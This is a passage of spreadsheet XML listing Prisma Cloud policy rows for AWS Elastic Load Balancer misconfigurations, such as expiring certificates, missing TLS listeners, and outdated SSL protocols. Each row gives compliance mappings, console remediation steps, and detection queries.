          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, ISO/IEC 27017:2015, PCI DSS v3.2.1, TX-RAMP Level 2, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, kashan ACSC Information Security Manual (ISM), ISO 27002:2022, NIST SP 800-172, ISO/IEC 27017:2015, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, kfirdaus AWS Account-CS, HITRUST v.9.4.2 [Deprecated], Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, NYDFS 23 CRR-NY 500.0, CIS Controls v8.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), Fedramp (Moderate), Korea – Information Security Management System (ISMS), CSA CCM v4.0.12, MAS TRM 2021, TX-RAMP Level 2, ISO/IEC 27017:2015, ISO/IEC 27017:2015, CSA CCM v.4.0.6, NIST 800-53 Rev 5, NIST CSF v2.0, Secure Controls Framework (SCF) - 2024.2, Fedramp (Moderate), Microsoft Cloud Security Benchmark v1, CyberSecurity Law of the People's Republic of China, Insurance Regulatory And Development Authority Of India, jneytchev-fedramp-low, CSA CCM v.4.0.6, Fedramp (Low), NIST CSF, ISO 27002:2022, ISO/IEC 27001:2022, ISO/IEC 27001:2022, TX-RAMP Level 1, ISO/IEC 27017:2015, NIST 800-53 Rev4, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, CSA CCM v4.0.12, ISO/IEC 27002:2013, ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), CSA CCM v4.0.12, NIST 800-53 Rev4, ISO/IEC 27017:2015, FFIEC, CSA CCM v.4.0.1, CRI Profile v2.0, ISO/IEC 27002:2013, Copy of CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, MAS TRM 2021, Secure Controls Framework (SCF) - 2022.2.1, ISO/IEC 27002:2013, CHC HITRUST CSF v.9.6.0, CDC NIST 800-53 Rev4, Korea – Information Security Management System (ISMS), APRA (CPS 234) Information Security, NIST SP 800-171 Revision 3, ITSG-33, GDPR, HITRUST CSF v.11.2.0, RBI Baseline Cyber Security and Resilience Requirements, GDPR, SOC 2, CSA CCM v.4.0.6, ITSG-33, NIST 800-53 Rev 5, MAS TRM 2021, NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v4.0.12, ISO/IEC 27002:2013, DORA, CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ITSG-33, TX-RAMP Level 2, Sarbanes Oxley Act (SOX), HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, ISO 27002:2022, NIST SP 800-172, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v.4.0.1, NIST 800-53 Rev 5, ISO/IEC 27018:2019</t>
        </is>
      </c>
      <c r="B1894" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1894" s="2" t="inlineStr"/>
      <c r="D1894" t="inlineStr"/>
      <c r="E1894" t="inlineStr"/>
      <c r="F1894" t="inlineStr"/>
      <c r="G1894" t="b">
        <v>1</v>
      </c>
      <c r="H18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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1894" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K1894" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer (ELB) with ACM certificate expired or expiring in 90 days</t>
        </is>
      </c>
      <c r="L1894" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1894" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1894" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1894" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1894" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1894" t="inlineStr">
        <is>
          <t>SC-1</t>
        </is>
      </c>
      <c r="R1894" t="inlineStr">
        <is>
          <t>SC-12</t>
        </is>
      </c>
      <c r="S1894" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1894" t="b">
        <v>0</v>
      </c>
      <c r="U1894" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1894" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1894" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancers (ELB) which are using ACM certificates expired or expiring in 90 days. AWS Certificate Manager (ACM) is the preferred tool to provision, manage, and deploy your server certificates. With ACM you can request a certificate or deploy an existing ACM or external certificate to AWS resources. As a best practice, it is recommended to reimport expiring/expired certificates while preserving the ELB associations of the original certificate.</t>
        </is>
      </c>
      <c r="X1894" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Go to Certificate Manager(ACM) service
4. Choose the reported certificate
5. Under 'Actions' drop-down click on 'Reimport certificate'
6. On the 'Import a certificate' page:
6a. For 'Certificate body*', paste the PEM-encoded certificate to import
6b. For 'Certificate private key*', paste the PEM-encoded, unencrypted private key that matches the SSL/TLS certificate public key
6c. (Optional) For 'Certificate chain', paste the PEM-encoded certificate chain delivered
6d. Click Review and import button to continue the process
7. On the 'Review and import' page, review the imported certificate details then click on 'Import'</t>
        </is>
      </c>
      <c r="Y1894" t="inlineStr"/>
      <c r="Z1894" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-elb-describe-load-balancers' as X; config from cloud.resource where api.name = 'aws-acm-describe-certificate' as Y; filter '($.X.description.listenerDescriptions[*].listener.sslcertificateId contains $.Y.certificateArn and ((_DateTime.ageInDays($.Y.notAfter) &gt; -90 and (_DateTime.ageInDays($.Y.notAfter) &lt; 0 or _DateTime.ageInDays($.Y.notAfter) == 0)) or (_DateTime.ageInDays($.Y.notAfter) &gt; 0)))'; show X;</t>
        </is>
      </c>
      <c r="AA1894" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1894" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1894" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-319</t>
        </is>
      </c>
      <c r="AD1894" t="b">
        <v>1</v>
      </c>
      <c r="AE1894" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1894" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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4" t="inlineStr">
        <is>
          <t>e2a025f5-d9d1-49ae-9eca-320f8da01b60</t>
        </is>
      </c>
      <c r="AI1894" t="inlineStr">
        <is>
          <t>4a32941a-def4-4485-8768-a6ce980ca62a</t>
        </is>
      </c>
      <c r="AJ1894" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1894" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1895">
      <c r="A1895" t="inlineStr">
        <is>
          <t>HIPAA, MAS TRM 2021, PCI DSS v4.0, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, CSA CCM v3.0.1, NIST SP 800-172, HITRUST CSF v.9.6.0, CHC HITRUST CSF v.9.6.0, Risk Management in Technology (RMiT), HITRUST CSF v9.3 [Deprecated], Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, HITRUST v.9.4.2 [Deprecated], GDPR, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5, NIST CSF, CSA CCM v3.0.1, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), HITRUST CSF v.9.6.0, NIST SP 800-171 Revision 2, CIS Controls v7.1, ISO 27001:2013, HITRUST CSF v9.3 [Deprecated], SOC 2, CRI Profile v1.2.1, Copy of CIS Controls v8, Microsoft Cloud Security Benchmark v1, ISO 27002:2022, CSA CCM v3.0.1, CSA CCM v3.0.1, ISO 27001:2013, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, GDPR, Secure Controls Framework (SCF) - 2024.2, CIS Controls v7.1, PCI DSS v4.0, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, TX-RAMP Level 2, PCI DSS v4.0, PCI DSS v4.0, NIST 800-53 Rev4, kfirdaus AWS Account-CS, CDC NIST 800-53 Rev4, Microsoft Cloud Security Benchmark v1, CSA CCM v4.0.12, kfirdaus AWS Account-CS, NIST SP 800-171 Revision 3, ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CHC HITRUST CSF v.9.6.0, DORA, jbrox - GDPR, MLPS 2.0 (Level 3), CIS Controls v8.1, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), ISO 27001:2013, GDPR, CRI Profile v1.2.1, SOC 2, PIPEDA, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Fedramp (Moderate), Secure Controls Framework (SCF) - 2024.2, MLPS 2.0, NYDFS 23 CRR-NY 500.0, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, APRA (CPS 234) Information Security, Copy of ACSC Information Security Manual (ISM)-clone, CCPA 2018, MAS TRM 2021, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), CIS Controls v8, CyberSecurity Law of the People's Republic of China, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, NIST 800-171 Rev1, Secure Controls Framework (SCF) - 2024.2, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1895" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1895" s="2" t="inlineStr"/>
      <c r="D1895" t="inlineStr"/>
      <c r="E1895" t="inlineStr"/>
      <c r="F1895" t="inlineStr"/>
      <c r="G1895" t="b">
        <v>1</v>
      </c>
      <c r="H18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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1895" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K1895" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer with listener TLS/SSL is not configured</t>
        </is>
      </c>
      <c r="L1895" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1895" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1895" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1895" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1895" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1895" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R1895" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S1895" t="inlineStr"/>
      <c r="T1895" t="b">
        <v>0</v>
      </c>
      <c r="U1895" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1895" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1895" t="inlineStr">
        <is>
          <t>This policy identifies AWS Elastic Load Balancers which have non-secure listeners. As Load Balancers will be handling all incoming requests and routing the traffic accordingly. The listeners on the load balancers should always receive traffic over secure channel with a valid SSL certificate configured.</t>
        </is>
      </c>
      <c r="X1895" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to EC2 dashboard
4. Click on 'Load Balancers' (Left Panel)
5. Select the reported ELB
6. On the Listeners tab, Click the 'Edit' button under the available listeners
7. In the Load Balancer Protocol, Select 'HTTPS (Secure HTTP)' or 'SSL (Secure TCP)'
8. In the SSL Certificate column, click 'Change'
9. On 'Select Certificate' popup dialog, Choose a certificate from ACM or IAM or upload a new certificate based on requirement and Click on 'Save'
10. Back to the 'Edit listeners' dialog box, review the secure listeners configuration, then click on 'Save'</t>
        </is>
      </c>
      <c r="Y1895" t="inlineStr"/>
      <c r="Z1895" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elb-describe-load-balancers' AND json.rule = '((description.listenerDescriptions[*].listener.protocol equals HTTPS or description.listenerDescriptions[*].listener.protocol equals SSL) and (description.listenerDescriptions[*].listener.sslcertificateId is empty or description.listenerDescriptions[*].listener.sslcertificateId does not exist)) or description.listenerDescriptions[*].listener.protocol equals HTTP or description.listenerDescriptions[*].listener.protocol equals TCP'</t>
        </is>
      </c>
      <c r="AA1895" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1895" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1895" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-39</t>
        </is>
      </c>
      <c r="AD1895" t="b">
        <v>1</v>
      </c>
      <c r="AE1895" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1895" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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5" t="inlineStr">
        <is>
          <t>836a7c8c-34c2-4861-be1e-df2f8cd27aab</t>
        </is>
      </c>
      <c r="AI1895" t="inlineStr">
        <is>
          <t>836a7c8c-34c2-4861-be1e-df2f8cd27aab</t>
        </is>
      </c>
      <c r="AJ1895" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1895" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1896">
      <c r="A1896" t="inlineStr">
        <is>
          <t>kfirdaus AWS Account-CS, ISO/IEC 27001:2022, Copy of ACSC Information Security Manual (ISM)-clone, RBI Baseline Cyber Security and Resilience Requirements, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, ISO 27002:2022, Copy of ACSC Information Security Manual (ISM)-clone, HITRUST v.9.4.2 [Deprecated], ACSC Information Security Manual (ISM), ISO/IEC 27001:2022, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), Secure Controls Framework (SCF) - 2022.2.1, kashan ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, ISO 27002:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), HITRUST CSF v.11.2.0, kashan ACSC Information Security Manual (ISM), kfirdaus AWS Account-CS, Secure Controls Framework (SCF) - 2024.2, HITRUST CSF v.11.2.0, PCI DSS v4.0, Copy of ACSC Information Security Manual (ISM)-clone, MLPS 2.0 (Level 2), CIS Controls v8, kfirdaus AWS Account-CS, ISO/IEC 27001:2022, Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), CIS Controls v7.1, Secure Controls Framework (SCF) - 2022.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Energy Sector Cyber Security Framework (AESCSF), CHC HITRUST CSF v.9.6.0, HITRUST v.9.4.2 [Deprecated], ISO 27002:2022, Copy of CIS Controls v8, NIST SP 800-172, PCI DSS v3.2.1, HITRUST CSF v.9.6.0, kashan ACSC Information Security Manual (ISM), MAS TRM 2021, ACSC Information Security Manual (ISM), ACSC Information Security Manual (ISM), Sarbanes Oxley Act (SOX), ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 1), ACSC Information Security Manual (ISM), CHC HITRUST CSF v.9.6.0, kfirdaus AWS Account-CS, HITRUST CSF v.9.6.0, PCI DSS v3.2.1, NIST SP 800-171 Revision 2</t>
        </is>
      </c>
      <c r="B1896" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1896" s="2" t="inlineStr"/>
      <c r="D1896" t="inlineStr"/>
      <c r="E1896" t="inlineStr"/>
      <c r="F1896" t="inlineStr"/>
      <c r="G1896" t="b">
        <v>0</v>
      </c>
      <c r="H18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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1896" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K1896" t="inlineStr">
        <is>
          <t>AWS Classic Load Balancer is in use for internet-facing applications</t>
        </is>
      </c>
      <c r="L1896" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M1896" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N1896" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1896" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1896" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1896" t="inlineStr">
        <is>
          <t>Guidelines for Personnel Security</t>
        </is>
      </c>
      <c r="R1896" t="inlineStr">
        <is>
          <t>ISM-0854</t>
        </is>
      </c>
      <c r="S1896" t="inlineStr"/>
      <c r="T1896" t="b">
        <v>0</v>
      </c>
      <c r="U1896" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1896" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1896" t="inlineStr">
        <is>
          <t>This policy identifies Classic Load Balancers that are being used for internet-facing HTTP/HTTPS applications. Classic Load Balancer should be used when you have an existing application running in the EC2-Classic network. Application Load Balancers (ALB) is recommended for internet-facing HTTP/HTTPS web applications.
For more details:
https://docs.aws.amazon.com/elasticloadbalancing/latest/application/create-application-load-balancer.html</t>
        </is>
      </c>
      <c r="X1896" t="inlineStr">
        <is>
          <t>To create Application Load Balancer (ALB) refer,
https://docs.aws.amazon.com/elasticloadbalancing/latest/application/create-application-load-balancer.html
Once Application Load Balancer created, you can delete the reported Classic Load Balancer by,
1. Log in to the AWS console
2. In the console, select the specific region from the region drop-down on the top right corner, for which the alert is generated
3. Navigate to EC2 Dashboard
4. Click on 'Load Balancers', choose the reported load balancer
5. Click on the 'Actions' and from the drop-down click on 'Delete'
6. Click on the 'Yes, Delete'</t>
        </is>
      </c>
      <c r="Y1896" t="inlineStr"/>
      <c r="Z1896" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elb-describe-load-balancers' AND json.rule = description.scheme contains internet-facing</t>
        </is>
      </c>
      <c r="AA1896" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1896" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1896" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-648</t>
        </is>
      </c>
      <c r="AD1896" t="b">
        <v>1</v>
      </c>
      <c r="AE1896" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1896" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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6" t="inlineStr">
        <is>
          <t>72859f28-0817-43d2-b249-1a9350e5aa89</t>
        </is>
      </c>
      <c r="AI1896" t="inlineStr">
        <is>
          <t>8e097c36-2157-44ca-a02a-244acbd748ee</t>
        </is>
      </c>
      <c r="AJ1896" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1896" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1897">
      <c r="A1897" t="inlineStr">
        <is>
          <t>HIPAA, PCI DSS v4.0, CHC HITRUST CSF v.9.6.0, HITRUST CSF v.9.6.0, CSA CCM v.4.0.1, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CRI Profile v2.0, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), GDPR, NIST CSF v2.0, APRA (CPS 234) Information Security, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.9.6.0, CHC HITRUST CSF v.9.6.0, NIST SP 800-172, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, PCI DSS v3.2.1, MITRE ATT&amp;CK v8.2 [Deprecated], HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, MITRE ATT&amp;CK v10.0 [Deprecated], ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, FFIEC, ITSG-33, CRI Profile v2.0, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ISO/IEC 27002:2013, HITRUST CSF v.9.6.0, MAS TRM 2021, NIST SP 800-171 Revision 2, CIS Controls v7.1, MITRE ATT&amp;CK v12, CRI Profile v1.2.1, Copy of CIS Controls v8, ISO 27002:2022, ISO/IEC 27017:2015, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, Matt's ATT&amp;ACK, ISO/IEC 27017:2015, GDPR, CIS Controls v7.1, PCI DSS v4.0, ACSC Information Security Manual (ISM), DORA, NIST CSF v2.0, ISO/IEC 27002:2013, TX-RAMP Level 2, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, NIST 800-53 Rev4, kfirdaus AWS Account-CS, Telecommunications Security Act - TSA, CDC NIST 800-53 Rev4, ISO/IEC 27018:2019, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27017:2015, NIST SP 800-171 Revision 3, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CHC HITRUST CSF v.9.6.0, DORA, MLPS 2.0 (Level 3), CIS Controls v8.1, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CSA CCM v.4.0.1, Sarbanes Oxley Act (SOX), MLPS 2.0 (Level 2), APRA (CPS 234) Information Security, kashan ACSC Information Security Manual (ISM), CRI Profile v1.2.1, SOC 2, NIST CSF, PCI DSS v3.2.1, CRI Profile v2.0, Copy of ACSC Information Security Manual (ISM)-clone, Fedramp (Moderate), ISO/IEC 27002:2013, MLPS 2.0, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, PCI DSS v4.0, APRA (CPS 234) Information Security, Secure Controls Framework (SCF) - 2022.2.1, Copy of ACSC Information Security Manual (ISM)-clone, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), ISO/IEC 27002:2013, CIS Controls v8, CIS Controls v8.1, CyberSecurity Law of the People's Republic of China, kashan ACSC Information Security Manual (ISM), Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CSA CCM v.4.0.1, NIST SP 800-172, Cybersecurity Maturity Model Certification (CMMC) v.1.02, PCI DSS v4.0</t>
        </is>
      </c>
      <c r="B1897" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1897" s="2" t="inlineStr"/>
      <c r="D1897" t="inlineStr"/>
      <c r="E1897" t="inlineStr"/>
      <c r="F1897" t="inlineStr"/>
      <c r="G1897" t="b">
        <v>1</v>
      </c>
      <c r="H18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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1897" t="inlineStr">
        <is>
          <t>aws-elb</t>
        </is>
      </c>
      <c r="K1897" t="inlineStr">
        <is>
          <t>AWS Elastic Load Balancer (Classic) SSL negotiation policy configured with vulnerable SSL protocol</t>
        </is>
      </c>
      <c r="L1897" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1897" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1897" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1897" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1897" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1897" t="inlineStr">
        <is>
          <t>Guidelines for Software Development</t>
        </is>
      </c>
      <c r="R1897" t="inlineStr">
        <is>
          <t>ISM-1552</t>
        </is>
      </c>
      <c r="S1897" t="inlineStr"/>
      <c r="T1897" t="b">
        <v>0</v>
      </c>
      <c r="U1897" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1897" t="inlineStr">
        <is>
          <t>aws-elb-describe-load-balancers</t>
        </is>
      </c>
      <c r="W1897" t="inlineStr">
        <is>
          <t>This policy identifies Elastic Load Balancers (Classic) which are configured with SSL negotiation policy containing vulnerable SSL protocol. The SSL protocol establishes a secure connection between a client and a server and ensures that all the data passed between the client and your load balancer is private. As a security best practice, it is recommended to use the latest version SSL protocol.</t>
        </is>
      </c>
      <c r="X1897" t="inlineStr">
        <is>
          <t>1. Sign into the AWS console
2. In the console, select the specific region from region drop down on the top right corner, for which the alert is generated
3. Navigate to EC2 Dashboard
4. Click on 'Load Balancers' (Left Panel)
5. Click on the reported Load Balancer
6. On 'Listeners' tab, Click on 'Edit' button
7. On 'Edit Listeners' popup for rule 'HTTPS/SSL',
-  If your cipher is 'Predefined Security Policy', change 'Cipher' to 'ELBSecurityPolicy-TLS-1-2-2017-01 or latest'
OR
- If your cipher is 'Custom Security Policy', Choose 'Protocol-TLSv1.2' only on 'SSL Protocols' section
8. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y1897" t="inlineStr"/>
      <c r="Z1897" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-elb-describe-load-balancers' AND json.rule = "(policies[*].policyAttributeDescriptions[?(@.attributeValue=='true')].attributeName equals Protocol-TLSv1) or (policies[*].policyAttributeDescriptions[?(@.attributeValue=='true')].attributeName equals Protocol-SSLv3) or (policies[*].policyAttributeDescriptions[?(@.attributeValue=='true')].attributeName equals Protocol-TLSv1.1)"</t>
        </is>
      </c>
      <c r="AA1897" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1897" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1897" t="inlineStr">
        <is>
          <t>PC-AWS-ELB-294</t>
        </is>
      </c>
      <c r="AD1897" t="b">
        <v>1</v>
      </c>
      <c r="AE1897" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1897" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG18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7" t="inlineStr">
        <is>
          <t>2bfc9a1e-bbad-4778-8116-99d07f1d2ba5</t>
        </is>
      </c>
      <c r="AI1897" t="inlineStr">
        <is>
          <t>01a96be9-dcdb-4161-8607-876d0e3e3769</t>
        </is>
      </c>
      <c r="AJ1897" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1897" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1898">
      <c r="A1898" t="inlineStr">
        <is>
